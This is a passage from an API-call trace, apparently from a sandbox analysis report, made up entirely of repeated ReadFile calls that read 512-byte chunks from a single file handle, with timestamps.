lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.881] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.881] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.881] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.882] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.882] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.882] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.882] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.882] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.882] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.882] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.882] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.883] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.884] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.885] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.888] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.888] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.888] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.893] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.893] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, 